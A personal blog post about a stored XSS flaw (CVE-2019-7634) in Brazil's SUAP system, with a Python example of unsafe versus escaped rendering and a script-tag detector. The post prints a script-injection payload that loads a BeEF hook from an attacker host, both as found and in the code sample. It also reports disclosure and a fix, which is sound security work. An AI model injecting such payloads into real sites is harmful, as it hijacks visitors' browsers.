2020/04/28

CVE-2019-7634: My first CVE

In this post, I will provide details about my first CVE. The vulnerability was discovered when I was on vacation and needed to update a piece of personal information in SUAP (Sistema Unificado de Administração Pública), a system used by several federal public institutions in Brazil.

The vulnerability

The vulnerability was Cross-site scripting (XSS). This kind of flaw allows an attacker to inject JavaScript code into a web page, where it runs with the privileges of the user viewing that page. In the case of SUAP, it was a stored XSS: the malicious code is saved in the application's database and served to every user who later views the affected page, so it does not depend on tricking a victim into clicking a crafted link.

After trying different payloads on various pages of the system, I finally found a flaw when updating the user’s data. I simply appended the following payload to a field in the form:

<script src="<IP>:3000/hook.js"></script>

And Voilà! This code will open a connection to BeEF, allowing me to inject different payloads in the victim’s browser remotely.
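To make the stored XSS concrete from the defender's side, here is an added example (not code from the post or from SUAP) showing the vulnerable rendering pattern beside its hardened form, using the same payload shape as above with a placeholder host. It assumes a hypothetical profile page that echoes a user-supplied display name; the third function is a simple detection aid that flags stored values containing a script tag, the kind of check an administrator could run over existing profile records after a report like this one.

```python
import html
import re

# Constructed sample input: the payload shape reported in the post,
# with a placeholder host instead of a real address.
STORED_PAYLOAD = '<script src="http://attacker.example:3000/hook.js"></script>'


def render_profile_unsafe(display_name: str) -> str:
    """Vulnerable pattern: user-controlled data concatenated straight into HTML.

    Whatever was stored in the database is emitted verbatim, so a stored
    <script> element becomes live code in every visitor's browser.
    """
    return f"<p>Name: {display_name}</p>"


def render_profile_safe(display_name: str) -> str:
    """Hardened pattern: escape on output.

    html.escape turns '<', '>', '&' and (with quote=True) both quote
    characters into entities, so the browser shows the text of the payload
    instead of executing it. Escaping at render time is what matters;
    validating on input alone leaves other output paths unprotected.
    """
    return f"<p>Name: {html.escape(display_name, quote=True)}</p>"


# Case-insensitive match for an opening script tag, tolerating whitespace
# after '<' the way some browsers do.
_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(value: str) -> bool:
    """Detection aid: True if a stored field value contains a script tag.

    Useful for auditing existing records; it is a triage signal, not a
    substitute for output encoding, since XSS has many tag-free variants.
    """
    return _SCRIPT_TAG.search(value) is not None


if __name__ == "__main__":
    print("unsafe :", render_profile_unsafe(STORED_PAYLOAD))
    print("safe   :", render_profile_safe(STORED_PAYLOAD))
    print("flagged:", contains_script_tag(STORED_PAYLOAD))
```

Running the script prints the raw `<script>` element for the unsafe renderer and the entity-encoded `&lt;script ...&gt;` text for the safe one; the fix that closed this class of bug is the second renderer, applied consistently wherever user data is emitted into HTML.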

After this, I immediately contacted the administration of the service with a Proof of Concept (PoC). The response was very fast and they quickly corrected the flaw. I suppose that by now all the federal institutions using SUAP have received the update.

XSS vulnerabilities are very common and are not that hard to discover, but everyone has to start somewhere. Besides, I had the opportunity to learn about the whole process of requesting a CVE.